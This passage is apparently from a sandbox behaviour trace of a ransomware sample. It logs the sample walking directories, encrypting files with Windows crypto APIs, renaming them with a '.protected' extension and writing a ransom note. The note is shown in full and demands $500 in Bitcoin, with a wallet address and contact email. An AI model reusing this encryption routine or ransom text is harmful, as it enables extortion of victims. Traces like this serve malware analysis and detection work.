lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x490a28 [0075.101] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.101] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.101] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.101] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.101] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\.") returned 84 [0075.101] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.101] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.101] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.101] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.101] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.101] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.101] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\..") returned 85 [0075.101] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.101] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.101] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="Windows") returned -1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="Program Files") returned -1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="Program Files (x86)") returned -1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="$Recycle.bin") returned 1 [0075.101] lstrcmpiW (lpString1="packages", lpString2="System Volume Information") returned -1 [0075.101] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages") returned 91 [0075.101] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0075.101] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0075.102] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*") returned 93 [0075.102] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b7a8 [0075.342] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.342] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.342] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.342] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.342] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.342] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\.") returned 93 [0075.342] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.342] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.342] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.342] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.342] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.342] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.342] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.342] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\..") returned 94 [0075.342] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.342] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.342] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Windows") returned -1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files") returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="Program Files (x86)") returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="$Recycle.bin") returned 1 [0075.342] lstrcmpiW (lpString1="vcRuntimeMinimum_x86", lpString2="System Volume Information") returned 1 [0075.343] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86") returned 112 [0075.343] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0075.343] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0075.343] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*") returned 114 [0075.343] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447c80 [0075.348] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0075.348] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0075.348] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0075.348] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0075.348] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0075.348] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\.") returned 114 [0075.348] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0075.348] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.348] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0075.348] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0075.348] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0075.348] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0075.349] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0075.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\..") returned 115 [0075.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0075.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0075.349] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="Windows") returned -1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files") returned -1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="Program Files (x86)") returned -1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="$Recycle.bin") returned 1 [0075.349] lstrcmpiW (lpString1="cab1.cab", lpString2="System Volume Information") returned -1 [0075.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.349] StrStrIW (lpFirst="cab1.cab", lpSrch=".protected") returned 0x0 [0075.349] lstrcmpW (lpString1="cab1.cab", lpString2="RESTORE_FILES.txt") returned -1 [0075.349] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.349] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.349] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.350] StrStrW (lpFirst="cab1.cab", lpSrch=".txt") returned 0x0 [0075.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.350] StrStrW (lpFirst="cab1.cab", lpSrch=".rar") returned 0x0 [0075.350] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned 121 [0075.350] StrStrW (lpFirst="cab1.cab", lpSrch=".zip") returned 0x0 [0075.350] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.371] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.371] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.371] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.371] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.404] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.404] CloseHandle (hObject=0xd8) returned 1 [0075.405] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 131 [0075.405] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\cab1.cab.protected")) returned 1 [0075.405] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Windows") returned -1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files") returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="Program Files (x86)") returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="$Recycle.bin") returned 1 [0075.405] lstrcmpiW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="System Volume Information") returned 1 [0075.405] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.405] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".protected") returned 0x0 [0075.405] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="RESTORE_FILES.txt") returned 1 [0075.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0075.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0075.405] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0075.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.406] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".txt") returned 0x0 [0075.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.406] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".rar") returned 0x0 [0075.406] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 138 [0075.406] StrStrW (lpFirst="vc_runtimeMinimum_x86.msi", lpSrch=".zip") returned 0x0 [0075.406] ReadFile (in: hFile=0xd8, lpBuffer=0x49e450, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.413] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.413] WriteFile (in: hFile=0xd8, lpBuffer=0x49e450*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49e450*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0075.414] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.414] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0075.415] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0075.415] CloseHandle (hObject=0xd8) returned 1 [0075.415] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 148 [0075.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi.protected")) returned 1 [0075.416] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0075.416] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0075.416] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 130 [0075.416] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0075.435] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.435] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0075.436] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.436] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0075.436] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.436] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0075.436] CloseHandle (hObject=0xd4) returned 1 [0075.437] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0075.437] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0075.437] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt") returned 109 [0075.437] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0075.438] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0075.438] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0075.439] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0075.439] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0075.439] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0075.439] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0075.439] CloseHandle (hObject=0xb4) returned 1 [0075.439] FindNextFileW (in: hFindFile=0x490a28, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0075.439] FindClose (in: hFindFile=0x490a28 | out: 